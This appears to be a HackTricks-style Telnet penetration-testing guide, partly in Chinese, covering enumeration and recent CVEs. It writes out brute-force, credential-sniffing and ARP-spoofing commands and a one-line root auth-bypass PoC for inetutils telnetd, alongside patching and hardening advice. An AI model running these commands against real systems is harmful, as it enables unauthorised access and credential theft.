23 - Telnet

💡 学习提示: 本文档介绍 Telnet 的渗透测试方法,适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

23 - Telnet 服务

基本信息

Telnet is a network protocol that gives users a UNsecure way to access a computer over a network.

默认 port: 23

23/tcp open  telnet

信息收集

nc -vn <IP> 23

All the interesting enumeration can be performed by nmap:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

The script telnet-ntlm-info.nse will obtain NTLM info (Windows versions).

From the telnet RFC: In the TELNET 协议 are various “options” that will be sanctioned and may be used with the “DO, DON’T, WILL, WON’T” structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc.

I know it is possible to enumerate this options but I don’t know how, so let me know if know how.

Enumerate Telnet Options / Features

Telnet uses IAC + DO/DONT/WILL/WONT negotiations to enable options. You can observe supported options by capturing the initial negotiation and by probing for specific features.

Nmap option/feature probes

## Detect support for the Telnet ENCRYPT option
nmap -p 23 --script telnet-encryption <IP>

## Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build)
nmap -p 23 --script telnet-ntlm-info <IP>

## Brute-force via NSE (alternative to Hydra/Medusa)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

The telnet-encryption script checks whether the ENCRYPT option is supported; some implementations historically handled this option incorrectly and were vulnerable, but the script only checks support. telnet-ntlm-info discloses NTLM metadata (NetBIOS/DNS/OS build) when Microsoft Telnet NTLM is enabled. telnet-brute is an NSE brute-force auditor for Telnet.

Brute force

Config file

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

HackTricks Automatic Commands

Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for t=Telnet
  Note: |
    wireshark to hear creds being passed
    tcp.port == 23 and ip.addr != myip

    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
  Name: Banner Grab
  Description: Grab Telnet Banner
  Command: nc -vn {IP} 23

Entry_3:
  Name: Nmap with scripts
  Description: Run nmap scripts for telnet
  Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
  Name: consoleless mfs enumeration
  Description: Telnet enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Recent Vulnerabilities (2022-2026)

  • CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860): Improper input validation in the telnet service allows remote attackers to log in using hard-coded credentials and inject OS commands; fixed by firmware 1.04B05 or later.
  • CVE-2023-40478 – NETGEAR RAX30: Stack-based buffer overflow in the Telnet CLI passwd command enables network-adjacent code execution as root; authentication is required but can be bypassed.
  • CVE-2022-39028 – GNU inetutils telnetd: A two-byte sequence (0xff 0xf7 / 0xff 0xf8) can trigger a NULL-pointer dereference in telnetd, and repeated crashes can lead inetd to disable the service (拒绝服务).

Keep these CVEs in mind during vulnerability triage—if the target is running an un-patched firmware or legacy inetutils Telnet daemon you may have a straight-forward path to code-execution or a disruptive 拒绝服务.

CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical)

Primitive: Telnet NEW_ENVIRON lets clients push environment variables during option negotiation; inetutils telnetd substitutes %U in its login template with getenv("USER") and passes it directly to /usr/bin/login, enabling argv-level option injection (no shell expansion). Root cause: versions 1.9.3–2.7 expand %U without filtering, so a USER value beginning with - is parsed as a login flag. For example, %U becomes -f root, yielding /usr/bin/login -h <hostname> "-f root" and skipping authentication via login -f.

利用 flow:

  1. Connect to the Telnet service and negotiate NEW_ENVIRON to set USER=-f root.
  2. telnetd builds the login argv including the attacker-controlled %U value.
  3. /usr/bin/login interprets -f root as “pre-authenticated user root” and spawns a root shell.

PoC

## Inject USER via NEW_ENVIRON and obtain a root shell
USER='-f root' telnet -a <ip>

Patch note: inetutils 2.7-2 introduces a sanitize() helper that rejects values starting with - or containing whitespace/metacharacters before substituting them into the login argv, blocking option injection. Detection/verification: identify exposed daemons with telnetd --version, dpkg -l | grep inetutils, systemctl status inetutils-telnetd, or netstat -tlnp | grep :23.

Mitigations

  • Patch/upgrade affected packages immediately (e.g., Debian fixes are in 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, and 2:2.7-2).
  • Disable Telnet or restrict access to trusted management networks while patching.

Sniffing Credentials & 中间人攻击

Telnet transmits everything, including credentials, in clear-text. Two quick ways to capture them:

## Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'

## Wireshark display filter
 tcp.port == 23 && (telnet.data || telnet.option)

For active 中间人攻击, combine ARP spoofing (e.g. arpspoof/ettercap) with the same sniffing filters to harvest passwords on switched networks.

Automated Brute-force / 密码 Spraying

## Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

## Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

## Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

Most IoT botnets (Mirai variants) still scan port 23 with small default-credential dictionaries—mirroring that logic can quickly identify weak devices.

漏洞利用 & Post-漏洞利用

Metasploit has several useful modules:

  • auxiliary/scanner/telnet/telnet_version – banner & option enumeration.
  • auxiliary/scanner/telnet/brute_telnet – multithreaded bruteforce.
  • auxiliary/scanner/telnet/telnet_encrypt_overflow – 远程代码执行 against vulnerable Solaris 9/10 Telnet (option ENCRYPT handling).
  • exploit/linux/mips/netgear_telnetenable – enables telnet service with a crafted packet on many NETGEAR routers.

After a shell is obtained remember that TTYs are usually dumb; upgrade with python -c 'import pty;pty.spawn("/bin/bash")' or use the HackTricks TTY tricks.

Hardening & Detection (Blue team corner)

  1. Prefer SSH and disable Telnet service completely.
  2. If Telnet is required, bind it to management VLANs only, enforce ACLs and wrap the daemon with TCP wrappers (/etc/hosts.allow).
  3. Replace legacy telnetd implementations with ssl-telnet or telnetd-ssl to add transport encryption, but this only protects data-in-transit—password-guessing remains trivial.
  4. Monitor for outbound traffic to port 23; compromises often spawn reverse shells over Telnet to bypass strict-HTTP egress filters.

搜索引擎语法

FOFA

# FOFA 搜索语法
port="23"

Shodan

# Shodan 搜索语法
port:23

ZoomEye

# ZoomEye 搜索语法
port:23

📖 参考资料